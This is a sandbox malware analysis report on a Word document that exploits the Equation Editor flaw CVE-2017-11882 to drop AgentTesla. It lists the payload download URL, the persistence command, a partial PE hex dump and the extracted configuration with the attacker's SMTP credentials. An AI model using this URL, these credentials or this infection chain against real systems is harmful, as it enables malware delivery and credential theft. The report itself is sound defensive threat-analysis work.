Play interactive tour

Edit tour

Analysis Report INQUIRY_RFQ_20210208.doc

Overview

General Information

Sample Name:	INQUIRY_RFQ_20210208.doc
Analysis ID:	349752
MD5:	8f0c3ff4740ecc3efd564329aac5e652
SHA1:	7fe3be34cb5edd69acdc9e00e63c504c037e7744
SHA256:	ce53c97a3f040dad92f109dba7902d7cc3540ccd1c3f6ae8e82553fa26a76f81
Tags:	doc
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Scheduled temp file as task from temp location

Yara detected AgentTesla

Yara detected AntiVM_3

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Installs a global keyboard hook

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Uses schtasks.exe or at.exe to add and modify task schedules

Adds / modifies Windows certificates

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2032 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 1692 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

RegAsmbvbvcrtyjgh.exe (PID: 260 cmdline: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe MD5: 4A8EB2631D91AD206D94D22179C54C0E)

schtasks.exe (PID: 2716 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\hEeIyOK' /XML 'C:\Users\user\AppData\Local\Temp\tmp8650.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

RegAsmbvbvcrtyjgh.exe (PID: 1696 cmdline: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe MD5: 4A8EB2631D91AD206D94D22179C54C0E)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "eO3kLZ6JGV5bG", "URL: ": "http://GTUj5adfCGo.orgbr>48Em", "To: ": "yumi@jljjmetals.com", "ByHost: ": "mail.privateemail.com:587", "Password: ": "UAorANoO", "From: ": "yumi@jljjmetals.com"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.2147145262.0000000002171000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000004.00000002.2147750440.0000000003179000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2404754353.0000000002856000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2404754353.0000000002856000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2404435302.00000000024EC000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2404435302.00000000024EC000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2403848274.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2404353388.0000000002421000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2404353388.0000000002421000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2147168383.0000000002191000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsmbvbvcrtyjgh.exe PID: 260	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsmbvbvcrtyjgh.exe PID: 260	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsmbvbvcrtyjgh.exe PID: 1696	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsmbvbvcrtyjgh.exe PID: 1696	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author
4.2.RegAsmbvbvcrtyjgh.exe.3468ff0.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.RegAsmbvbvcrtyjgh.exe.3468ff0.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.RegAsmbvbvcrtyjgh.exe.2181524.3.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
7.2.RegAsmbvbvcrtyjgh.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.RegAsmbvbvcrtyjgh.exe.3363940.6.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.RegAsmbvbvcrtyjgh.exe.21fd698.4.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe, CommandLine: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe, NewProcessName: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe, OriginalFileName: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1692, ProcessCommandLine: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe, ProcessId: 260

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 43.252.37.193, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1692, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1692, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\6vWjC1g7qA0Z76f[1].exe

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\hEeIyOK' /XML 'C:\Users\user\AppData\Local\Temp\tmp8650.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\hEeIyOK' /XML 'C:\Users\user\AppData\Local\Temp\tmp8650.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe, ParentImage: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe, ParentProcessId: 260, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\hEeIyOK' /XML 'C:\Users\user\AppData\Local\Temp\tmp8650.tmp', ProcessId: 2716

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://globalteamacademy.com/showcase/bill/6vWjC1g7qA0Z76f.exe

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: RegAsmbvbvcrtyjgh.exe.1696.7.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "eO3kLZ6JGV5bG", "URL: ": "http://GTUj5adfCGo.orgbr>48Em", "To: ": "yumi@jljjmetals.com", "ByHost: ": "mail.privateemail.com:587", "Password: ": "UAorANoO", "From: ": "yumi@jljjmetals.com"}

Multi AV Scanner detection for domain / URL

Show sources

Source: globalteamacademy.com

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\6vWjC1g7qA0Z76f[1].exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Roaming\hEeIyOK.exe	ReversingLabs: Detection: 23%

Multi AV Scanner detection for submitted file

Show sources

Source: INQUIRY_RFQ_20210208.doc	Virustotal: Detection: 43%			Perma Link
Source: INQUIRY_RFQ_20210208.doc	ReversingLabs: Detection: 48%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 4x nop then jmp 00271141h		4_2_00270354
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		4_2_0027D800

Source: global traffic

DNS query: name: globalteamacademy.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 43.252.37.193:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 43.252.37.193:80

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://GTUj5adfCGo.orgbr>48Em

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 198.54.122.60:587

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 08 Feb 2021 05:39:02 GMTServer: ApacheLast-Modified: Sun, 07 Feb 2021 21:36:33 GMTAccept-Ranges: bytesContent-Length: 1377280Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e4 5b 20 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 fa 14 00 00 08 00 00 00 00 00 00 4e 18 15 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 17 15 00 53 00 00 00 00 20 15 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 15 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 f8 14 00 00 20 00 00 00 fa 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 20 15 00 00 06 00 00 00 fc 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 02 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 18 15 00 00 00 00 00 48 00 00 00 02 00 05 00 38 8a 11 00 c0 8d 03 00 03 00 00 00 01 00 00 06 10 a3 04 00 28 e7 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 01 00 00 0a 28 02 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 03 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 07 00 00 0a 00 02 16 28 08 00 00 0a 00 02 17 28 09 00 00 0a 00 02 17 28 0a 00 00 0a 00 02 16 28 0b 00 00 0a 00 2a 00 4e 00 02 28 09 00 00 06 6f 1a 00 00 06 28 0d 00 00 0a 00 2a 26 00 02 28 0f 00 00 0a 00 2a 00 00 ce 73 10 00 00 0a 80 01 00 00 04 73 11 00 00 0a 80 02 00 00 04 73 12 00 00 0a 80 03 00 00 04 73 13 00 00 0a 80 04 00 00 04 73 14 00 00 0a 80 05 00 00 04 2a 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 15 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 16 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 17 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 18 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6

Source: Joe Sandbox View	IP Address: 43.252.37.193 43.252.37.193
Source: Joe Sandbox View	IP Address: 198.54.122.60 198.54.122.60

Source: Joe Sandbox View

ASN Name: NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 198.54.122.60:587

Source: global traffic

HTTP traffic detected: GET /showcase/bill/6vWjC1g7qA0Z76f.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: globalteamacademy.comConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BFC4F63-025D-4403-9DBE-B492A11253DC}.tmp

Jump to behavior

Source: global traffic

Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: globalteamacademy.com

Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404353388.0000000002421000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404353388.0000000002421000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404754353.0000000002856000.00000004.00000001.sdmp	String found in binary or memory: http://GTUj5adfCGo.org
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404557790.0000000002647000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2403941889.000000000059E000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404007772.000000000062B000.00000004.00000020.sdmp, RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2403941889.000000000059E000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.7.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404353388.0000000002421000.00000004.00000001.sdmp	String found in binary or memory: http://etNSag.com
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404557790.0000000002647000.00000004.00000001.sdmp	String found in binary or memory: http://mail.privateemail.com
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.gva.es0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404557790.0000000002647000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
Source: RegAsmbvbvcrtyjgh.exe, 00000004.00000002.2151415569.00000000054C0000.00000002.00000001.sdmp, RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2408242367.0000000005F20000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: RegAsmbvbvcrtyjgh.exe, 00000004.00000002.2147145262.0000000002171000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409603554.0000000007C50000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: RegAsmbvbvcrtyjgh.exe, RegAsmbvbvcrtyjgh.exe, 00000007.00000000.2145847246.0000000000A52000.00000020.00020000.sdmp, hEeIyOK.exe.4.dr	String found in binary or memory: http://tempuri.org/ConsultationReport.xsd
Source: RegAsmbvbvcrtyjgh.exe, 00000004.00000002.2151415569.00000000054C0000.00000002.00000001.sdmp, RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2408242367.0000000005F20000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://www.ancert.com/cps0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.Q
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://www.crc.bg0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://www.disig.sk/ca0f
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://www.globaltrust.info0=
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0%
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp, RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://www.sk.ee/cps/0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: http://www.ssc.lt/cps03
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: http://www.valicert.com/1
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404557790.0000000002647000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	String found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: RegAsmbvbvcrtyjgh.exe	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
